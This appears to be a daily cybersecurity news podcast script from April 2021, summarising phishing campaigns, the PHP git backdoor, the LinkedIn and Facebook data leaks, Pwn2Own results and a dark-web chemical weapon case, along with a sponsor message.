Cyber Security Headlines – April 9, 2021

Office 365 phishing hides behind HTML that stacks up like Legos

A recent phishing campaign used hidden building blocks of HTML code, stored both locally and remotely, to build a site that collects Microsoft Office 365 credentials. The code is hidden in JavaScript files that are glued together like so many Lego building blocks to create a site where victims’ logins are scooped up. It starts with an email with an attachment claiming to be an Excel file about an investment but which is actually an HTML document with a chunk of URL Encoded text. When Trustwave researchers picked apart the text, they found links to two JavaScript files hosted at a domain used for other phishing campaigns.

(Bleeping Computer)

Tech support scammers sending fake antivirus subscription bills

They’re sending emails pretending to be invoices from Norton Lifelock, Microsoft, and McAfee that claim that the recipient will be charged between $350 to $399 for a three-year subscription unless they call to cancel the subscription. The attackers constantly change the email subjects, but according to Vade Security, all the messages purport to be a billing subscription from a well-known security company. The crooks hope that the recipients call the number so they can talk the targets into giving them remote access to their computers. If they do, the scammers can install remote access software that can be used to install malware.

(Bleeping Computer)

PHP user database leaked in recent Git server attack

Late last month, threat actors pushed malicious commits to a repository for the PHP programming language hosted on the Git repository maintained by the PHP team on their git.php.net server. The malicious code commits resulted in a backdoor being added to the PHP source code. The code maintainers are now saying that the threat actors may have gotten their hands on a user database containing passwords in order to make those unauthorized changes. Further investigation has shown that the commits resulted from being pushed using HTTPS and password-based authentication, leading the code maintainers to suspect a possible leak of the master.php.net user database.

(The Hacker News)

Trump’s Tweets won’t make it into the National Archives

Twitter won’t let the National Archives make the former president’s tweets available on its platform. It told Politico that its permanent suspension of Trump’s personal account means that the federal record keeper is blocked, just like everybody else. The National Archives and Records Administration has been working to create an official online archive of Trump’s tweets as president, including those that got him permanently suspended as a threat to public safety. Not all Trump-isms are off-limits: NARA already maintains archives of old tweets from the institutional and personal accounts of many other former Trump administration officials with which users can interact, retweet and like.

(Politico)

Thanks to our episode sponsor, Sotero

Okay, here’s a story that’ll warm your heart. A pharmaceutical company was having a really hard time making sensitive data available to downstream systems. Due to their security requirements, they were forced to transfer the data manually, which delayed the data’s availability by an entire month. Guess what they did? They turned to our sponsor – Sotero – to keep the data encrypted as the data is sent to downstream systems. And here’s the best part . . . With the data secure while in motion, they shortened the data transfer time from a month to a few hours. Amazing! I encourage you to check out Sotero at them Soterosoft.com.

Scraped data from 500m LinkedIn users is up for sale

Data purportedly scraped from 500 million LinkedIn profiles is up for sale on a popular criminal forum, and the seller has posted yet another 2 million records as proof-of-concept. The files contain information including users’ full names, email addresses, phone numbers, workplace information, links to other social media profiles, professional titles, other work-related data and more: all valuable data for phishers, spammers, and other online crooks who can use it to brute-force passwords. According to Security Affairs, forum users can view the leaked samples for about $2 worth of forum credits, while the entire 500 million user database is being auctioned for at least four digits.

(Security Affairs)

Facebook has no plans to notify half-billion affected by data leak

Facebook is sticking to its guns when it comes to not notifying more than 530 million users whose details were leaked prior to 2019. It never did, and it has no intention of doing so now, the company said on Wednesday. At any rate, Facebook isn’t entirely sure which users it would need to notify. Besides, users can’t fix the issue now that the data’s publicly available, a spokesman said. We’ll have to wait and see what regulators have to say about this, the latest in Facebook’s string of user data-bungling. As of Wednesday, the company was answering regulators’ questions. 

(Reuters)

Win10 hacked a third time at Pwn2Own

On Wednesday, Microsoft’s operating system fell twice to contestants in the 2021 Pwn2Own. On Thursday, it got owned yet again. The trio of vulnerabilities allowed three separate sets of contestants to jack up privileges from a normal user to SYSTEM by exploiting, in order, 1)  a Race Condition bug, 2) an undocumented integer overflow weakness, and 3) another previously unknown integer overflow bug. Google Chrome and the Chromium-based Microsoft Edge web browsers were also dismantled by use of a Type Mismatch bug, while  Zoom Messenger was taken over by use of a zero-click exploit chain that combined three different bugs.

(Bleeping Computer)

US dark-web user imprisoned for trying to buy chemical weapons

A Missouri man was sentenced to 12 years for twice trying to buy a chemical weapon that he told a seller he’d use “soon after I receive it.” Using a stolen identity, 46-year-old Jason William Siesser paid about $150 in Bitcoin for three 10 milliliter units of the chemical, or enough to kill about 300 people. Investigators instead sent him a package full of an inert substance. A search of Siesser’s home turned up about 10 grams of the toxic compound cadmium arsenide, some 100 grams of cadmium metal, and around 500 mL of hydrochloric acid.

(InfoSecurity)